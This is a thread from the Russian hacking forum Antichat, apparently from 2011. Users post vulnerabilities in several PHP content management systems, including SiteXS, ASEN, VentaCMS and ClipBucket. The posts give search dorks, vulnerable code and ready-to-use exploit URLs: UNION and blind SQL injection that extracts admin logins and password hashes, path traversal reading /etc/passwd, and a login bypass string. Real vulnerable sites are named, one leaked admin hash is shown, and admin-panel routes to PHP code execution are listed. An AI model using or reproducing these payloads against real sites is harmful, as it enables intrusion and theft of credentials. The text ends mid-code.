ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.08.2011, 13:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
SiteXS CMS [SQL-inj && XSS && PHP-inc]
++++++++++++
...this is the beginning, of progressive attack... (c) The Theme, Brooklyn Bounce
++++++++++++
dork: "is powered by SiteXS CMS"
1::SQL-inj::[GET]
users.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
global[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HTTP_POST_VARS[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from users where id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/modules/member.php?id=-666+UNION+SELECT+1,group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+users+WHERE+admin=1+--
2::SQL-inj::[GET]
subscribe.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"mid"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from subs_messages where id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mid[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/message.php?mid=-666+UNION+SELECT+1,2,3,group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),5,6,7,8,9+FROM+users+WHERE+admin=1+--
3::SQL-inj::[GET]
sitemap.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"did"[/COLOR][COLOR="#007700"]];
...
function[/COLOR][COLOR="#0000BB"]_sel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$menu[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
...
[/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_sel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$url1[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id, title, url from chapters where (pid=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]and url<>'searchresult' and url<>'sitemap' and type<>4 and id<>1)[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#DD0000"]order by sortorder"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/map.php?did=-666+UNION+SELECT+group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),2,3+FROM+users+WHERE+admin=1+--
4:HP-inc
export.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pg"[/COLOR][COLOR="#007700"]];
...
include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$root[/COLOR][COLOR="#DD0000"]/lib/[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];
...
foreach ([/COLOR][COLOR="#0000BB"]$lines[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"|||"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'(\d{1,2})\.(\d{1,2})\.(\d{1,4}) (\d{1,2}):(\d{1,2}):(\d{1,2})'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]mktime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"||||||||n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$hc[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"||||||||n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id from news where matID=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"insert into news set time='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', title='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', text='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', matID='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"];
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/export.php?pg=../../../../../../etc/passwd%00
5:HP-inc
post.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]_POST[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
exploit:
Код:
Code:
by POST method!
http://temp/post.php?type=../../../../../../../etc/passwd%00
6::SQL-inj::[POST]
adm.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pass"[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=new[/COLOR][COLOR="#0000BB"]sql[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]connect[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id, pass from users where login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
|
|
|
|
20.09.2011, 07:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
5
|
|
ASEN CMS 5.4.2
http://wap-studio.ru
обход авторизации
логин ' or 1=1-- пасс любой
|
|
|
|
08.10.2011, 17:01
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
VentaCMS [SQL-inj]
search.php
SQL-inj::[POST]
Сообщение от None
...
Поиск услуг по городам
">
">
">
str; ?>" id="text" />
-->
Ваш город
$city) { ?>
">
...
Сообщение от None
...
if($_POST['action']=="search")
{
$error = "";
if((strlen(trim($_POST['str']))city_id && !$request->cat_id) $error['str'] = "Вы указали неправильные параметры поиска";
if(!$error)
{
$offerObj = new absOffers();
$search['offers'] = $offerObj ->siteSearch($request->str, $request->city_id, $request->cat_id); // search in offers
$send = true;
}
}
...
Сообщение от None
...
function siteSearch ($str = null, $city = null, $cat = null) // поиск по заголовку и тексту страниц сайта
{
global $mysql;
$select = new SelectFromDB($mysql, __LINE__);
$select -> addWhere("active='1'");
if($city) $select -> addWhere("city_id='$city'");
if($cat) $select -> addWhere("cat_id='$cat'");
// if($str) $select -> addWhere("MATCH (caption, description) AGAINST ('".trim($str)."' IN BOOLEAN MODE)");
if($str) $select -> addWhere("(caption LIKE '%".trim($str)."%' OR description LIKE '%".trim($str)."%')");
$select
-> addFild("{$this->table}.*")
-> addFild("(SELECT COUNT( item_id ) FROM mod_offer_comments WHERE active = '1' AND mod_offers.id = item_id) AS comments"); // Вложенный подзапрос количество комментов
return $select -> addFrom($this->table) -> addOrder($this->order, DESC) -> queryDB();
}
...
Сообщение от None
...
Поиск услуг по городам
...
Пример уязвимого сайта:
Сообщение от None
_http://spravim.ru/
Сайт производителя:
Сообщение от None
_http://www.promo-venta.ru/
|
|
|
30.10.2011, 18:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
_http://flexigrid.info/ -> плагин таблицы для jquery
_http://iexx.biz/post/dynamic tables with FlexGrid.html -> рабочий пример с реализацией на PHP
_http://sanderkorvemaker.nl/test/flexigrid/flexigrid.zip -> исходники
index.php
...$("#flex1").flexigrid
(
{
url: 'post2.php',...
post2.php вытаскивает записи с БД у указаными параметрами количество записей, страница, сортировка, данные с grida лезут.
Отлавливаем скрипт, напрямую обращаемся и проверяем параметры.
blind sql
=> false
=>true
|
|
|
|
02.11.2011, 01:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
ClipBucket CMS
ClipBucket CMS 2.6 (последняя версия)
clip-bucket.com
prefix: cb_
dorki: Forged by ClipBucket // Arslan Hassan // view_item.php collection item type
exploits:
Time-Based
Код:
Code:
GET /watch_video.php?v=GNDB5XUWMW32' AND 666=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 1),SLEEP(5),666) AND 'qwe'='qwe
или
Boolean-Based
Код:
Code:
GET /view_item.php?item=DKHM63R22191' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0,1),1,1)) > 112 AND 'qwe'='qwe&type=photos&collection=9
examples:
Сообщение от None
http://video.tv-kino.com/view_item.php?collection=10&item=58HOS3XG5G4U&type =videos
Код:
Code:
admin:3afe97fe4ad12d234bec2db193e8e649
Сообщение от None
http://medvideo.kz/view_item.php?item=DKHM63R22191&type=photos&collec tion=9
Сообщение от None
http://watched.eu/watch_video.php?v=X7D8XUB7GAUG
Сообщение от None
1) разрешить php как расширение при загрузке
2) разрешить php в шаблонах
3) упаковать в zip и через плагины
Код:
Code:
админка: /admin_area
Ну и собстенно сюрприз:
function pass_code($string) {
$password = md5(md5(sha1(sha1(md5($string)))));
return $password;
}
vurnel files:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]<font color="DarkOrange">
<i>view_item.php</i>
</font>[COLOR="#007700"][/COLOR][COLOR="#0000BB"]is_viewable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]))
{
if(empty([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);
else
{
if(empty([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);
else
{
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"type"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cid"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbcollection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collections[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])
{
case[/COLOR][COLOR="#DD0000"]"videos"[/COLOR][COLOR="#007700"]:
case[/COLOR][COLOR="#DD0000"]"v"[/COLOR][COLOR="#007700"]:
{
global[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#FF8000"]//Getting list of collection items
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_clean[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]create_query_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"collection_items"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]".ci_id DESC"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_items_with_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'items'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'open_collection'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id,collection_id'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'video'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
break;
case[/COLOR][COLOR="#DD0000"]"photos"[/COLOR][COLOR="#007700"]:
case[/COLOR][COLOR="#DD0000"]"p"[/COLOR][COLOR="#007700"]:
{
global[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_photo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
